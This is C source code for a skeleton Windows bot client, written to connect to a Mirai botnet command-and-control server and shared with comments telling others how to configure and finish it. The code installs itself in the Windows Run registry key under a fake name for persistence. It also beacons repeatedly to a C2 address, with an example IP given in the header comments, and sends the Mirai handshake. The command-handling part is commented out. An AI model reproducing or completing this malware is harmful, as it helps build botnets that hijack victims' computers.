// made by snowflake incorporated // established 2002 // based out of hoboken NJ // IMPORTANT NOTE // DO NOT CHANGE THE EXTENSION TO .c // IT BREAKS IT FOR SOME UNKNOWN REASON // PROBABLY BECAUSE VISUAL STUDIO IS TERRIBLE SOFTWARE // you may need to edit the mirai server // to handle windows clients // to configure scroll down to establishconn() // edit // sockaddr.sin_addr.s_addr = inet_addr("209.141.33.126"); // x.x.x.x to your CNC IP address // this is a skeleton // I removed a bunch of code // so most of these includes are useless #define _WINSOCK_DEPRECATED_NO_WARNINGS #define _CRT_SECURE_NO_WARNINGS #include #include #include #include #include #include #include #include #include #pragma comment(lib, "ws2_32.lib") #define MAX_WORDS 4096 DWORD dwMainCommSock; // main socket BOOL bConnection = FALSE; // boolean value for connection UINT8 uiLen; // not used int iRes; // idfk // basically printf for socket. Copied from an IRC bot. // PLOT TWIST it's never used so I commented it out //void raw(int sock, char *words, ...) { // static char chBuf[1024]; // va_list vaArgs; // va_start(vaArgs, words); // vsprintf(chBuf, words, vaArgs); // va_end(vaArgs); // printf("<< %s", chBuf); // send(sock, chBuf, sizeof(chBuf), 0); //} // persistence. // I suggest you use a different method of persistence // best way is to attach to a system file // but I don't know how to implement it so... void AddToStartup() { BYTE chPath[MAX_PATH]; // buffer for path to this file GetModuleFileName(NULL, (LPSTR)chPath, MAX_PATH); // get's full path to file HKEY hNewVal; // registry handle // you should know what this does // change "fakename" to the fake name in the registry // or even better // generate a random string for the fake name RegOpenKeyA(HKEY_CURRENT_USER, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", &hNewVal); RegSetValueEx(hNewVal, "fakename", 0, REG_SZ, chPath, sizeof(chPath)); // closes registry handle RegCloseKey(hNewVal); } // establishes connection static void establishconn() { // DO NOT FUCKING REMOVE THIS WSAData wsa; iRes = WSAStartup(MAKEWORD(2, 2), &wsa); // REMOVING WSAStartup will break winsock. // Don't add another one too, that will also break winsock // new socket dwMainCommSock = socket(AF_INET, SOCK_STREAM, 0); if (dwMainCommSock == -1) { // if socket fails, bConnection becomes false, showing no connection bConnection = FALSE; } // sockaddr struct, has information about socket SOCKADDR_IN sockaddr; sockaddr.sin_port = htons(69); sockaddr.sin_family = AF_INET; // Just change the IP sockaddr.sin_addr.s_addr = inet_addr("x.x.x.x"); // connects the socket to the server. // uses the sockaddr struct to pull info if (connect(dwMainCommSock, (SOCKADDR *)(&sockaddr), sizeof(sockaddr)) != 1) { // if successful, bConnection is TRUE bConnection = TRUE; } // error message for debugging. wchar_t *wchError = NULL; FormatMessageW(FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_IGNORE_INSERTS, NULL, WSAGetLastError(), MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT), (LPWSTR)&wchError, 0, NULL); fprintf(stderr, "%S\n", wchError); LocalFree(wchError); } // drops connection static void drop_con() { if (dwMainCommSock == -1) { // if dwmaincommsock = -1 closesocket(dwMainCommSock); // closes socket dwMainCommSock = -1; } } int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { //int main() { AddToStartup(); // you should know what this does char chRecvBuf[256]; // never used. Remove it while (1) { u_long * iMode = 0; // never used. Remove it char chBuf[256]; // also never used. Remove it //OutputDebugString("[*] CONNECTING TO SERVER"); if (dwMainCommSock == -1) { // if socket is -1 establishconn(); // establish connection } if (!bConnection) { // if bConnection is FALSE drop_con(); // drop connection Sleep(1); // sleep for 1 millisecond establishconn(); // try again } if (bConnection){ // uwu what's this? connection succsessful? // chIdBuf is for the buffer // that the server needs to identify // the OS the client is running char *chIdBuf = NULL; //ZeroMemory(id_buf, sizeof(id_buf)); // this is a windows bot // so the id buf is "windows" chIdBuf = (char *)"windows"; UINT8 uintIdLen = strlen(chIdBuf); // length of the ID buffer // sends 4 bytes to connect send(dwMainCommSock, "\x00\x00\x00\x01", 4, NULL); send(dwMainCommSock, (const char *)&uintIdLen, sizeof(uintIdLen), NULL); if (uintIdLen > 0) { // if the length of ID is greater than 0 // sends the ID buffer send(dwMainCommSock, chIdBuf, uintIdLen, NULL); } // that's where I stopped because // the guy broke the server // so the bot connected // and showed up in the server // but receiving commands? // I think not // when u have a working server // just uncomment the code below // and put it in a loop unsigned char chReadBuf[256] = { 0 }; uint16_t uiLen; /* int retval = recv(maincommsock, (char *)&len,sizeof(len), 0); printf("retval: %d\n", retval); len = htons(len); if (retval == sizeof(len)) { retval = recv(maincommsock, (char *)rdbuf, len, 0); printf("retval: %d\n", retval); printf("RDBUF: %s\n", rdbuf); } */ } } return 0; }